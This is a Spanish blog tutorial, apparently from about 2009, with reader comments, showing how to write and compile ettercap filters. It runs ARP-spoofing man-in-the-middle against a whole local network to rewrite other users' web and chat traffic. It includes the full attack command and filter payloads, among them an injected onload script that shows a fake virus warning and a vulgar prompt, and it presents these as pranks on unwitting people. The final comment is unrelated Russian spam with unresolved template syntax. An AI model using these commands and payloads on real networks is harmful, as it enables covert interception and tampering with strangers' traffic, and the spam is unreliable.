Filtros simples en ettercap

Les motraré cómo crear filtros simples para usar con ettercap, para que podamos modificar parte del tráfico como tags html, conversaciones de chat, etc.
Para esto necesitamos obviamente instalar el suit ettercap-ng, lo podemos descargar desde Sitio oficial ettercap

Haremos las pruebas con el sitio https://www.google.cl, modificaremos el título, el contenido, la imágen, etc.

Para este ejemplo vamos a crear un filtro llamado google.filter. Lo creamos usando nuestro editor de texto preferido, en mi caso vim:

$ vim google.filter

En él escribimos:

  1. replace("</title>", "</titleee>");
  2. replace("<title>", "<title>Gooooooogle</title><titleee>");

Guardamos y compilamos el filtro usando etterfilter:

$ etterfilter google.filter

Nos creará un fichero llamado filter.ef, que es el que usaremos.
Ejecutamos ettercap y aplicamos el filtro:

# ettercap -Tq -M arp:remote -i interface -F filter.ef // //

Ahora cualquier pc de la red, cuando ingrese a Google, verá el título modificado.

Podemos modificar el tag o información que queramos, no solo html, sino todo el tráfico de la red.
Por ejemplo, si queremos modificar la o las imágen de un sitio:

  1. replace("\<img", "\<img src=https://direccion..de/la/imagen/que/quieres_insertar.jpg\> \<aaa");

nota: Con todo esto, lo que estámos haciendo es modificar cualquier información que este viajando por la red, no solo las páginas web, si hacen la prueba y escriben <img por msn, verán que ettercap automáticamente lo reemplazará por lo que especificamos en el filtro.
Tambien podemos especificar que sólo queremos jugar con el protocolo http y la web agregando la siguiente condición a nuestro filtro:

  1. if (ip.proto == TCP &amp;&amp; tcp.src == 80) {
  2. [] acá las acciones
  3. }

Aprendiendo a aplicar e implementar estos filtros podemos hacer una infinidades de cosas divertidas, ya sea para fastidiar a algun amigo o simplemente para joder a los demás. Es cosa de usar la imaginación, por ejemplo, el siguiente filtro:

  1. replace("\<body", "\<body onload=\"alert(‘Usted tiene un virus.’);confirm(‘Chupamela?’);\"\>");

Hará que cuando alguien ingrese a cualquier sitio aparezca una alerta diciendo que tiene un virus y luego, para joderle un poco más, una ventana de confirmación.

9 comentarios

  1. Fue bien productivo el rato que estuvimos jugando con ettercap. 😀

  2. Puedo jugar con ettercap, en mi casa, sin tener un red?
    hice estas pruebas y me tira el siguiente mensaje:

    Content filters loaded from filter.ef…
    Listening on interface…
    ERROR : 19, No such device
    [ec_capture.c:capture_init:146]

    pcap_open: SIOCGIFHWADDR: No such device

    es porque no estoy en una red, o porque estoy haciendo algo mal?

    Muchas Gracias.

    saludos

  3. Zerial

    octubre 22, 2009 a las 11:19 am

    @Andres: El parametro “-i interface” define la interface que usaras para capturar los paquetes. El error “No such device” hace referencia a que no encuentra el dispositivo especificado. La interface debe ser tu tarjeta etherner o wireless, generalmente eth0, eth1, eth…, ethN o bien wlan0, …wlanN.

    saludos

  4. Gracias zerial, tratare de indicarle el dispositivo que en mi caso es eth0.

    Saludos

  5. ¿En qué lenguaje se programan los filtros?
    Saludos!

  6. Zerial

    julio 17, 2010 a las 10:55 pm

    @Diego: Tengo entendido que es una sintaxis que ettercap interpreta en forma JIT, el lenguaje no es ningun en especial, simplemente “el lenguaje ettercap”. No estoy 100% seguro, pero pienso que es asi

    saludos

  7. :O que bien, justo lo que estaba buscando en google y me mando directamente a la pagina del buen Zerial… estos filtros son ideales para fastidiar gente xD

  8. No existe un lenguaje. O sea, hay sin dudas comandos que determinan una linea. pero todo está pensado en base a cómo se trafica los packetes. si el pakete va en hex (crudo), las modificaciones las tendras que hacer en hex. Si los packetes llevan datos tipo html, bueno eso lo puedes modificar (filtrar) en html. Si el packete trae ascii (texto plano) como msn (jejeje) las modificaciones las deveras hacer en ascii. Bueno es demasiado obvio que digo, tambien es obvio que puedes mezclar (por ejemplo un mensaje en msn ascii, pasarlo (filtrarlo) a html o a otro “lenguaje”… De eso se trata. Es decir, si vamos a mosquear a la gente seamos creativos e ingeniosos.

    Lo que vendria de cajon sería, hacer un glosario con: cuáles son los comandos que aguanta el generador de filtro.
    Ya sabemos que aguanta. replace, los if,
    Ya

  9. (Интересные|Еще какие|Разные|Супер|Странные) (мысли|соображения|идеи) сообразно (прибиванию|употреблению|применению) (вагонки|евровагонки) (в|на) (балконах|бытовках) и на (лолжии|лоджиях). Натуральные вещество, приятный запах. ОБалденный внешний вид и все это (evro-vagonka.ru|http://evro-vagonka.ru/|http://evro-vagonka.ru|www.evro-vagonka.ru|http://www.evro-vagonka.ru/|evro-vagonka.ru|evro-vagonka.ru/).

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Esto sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.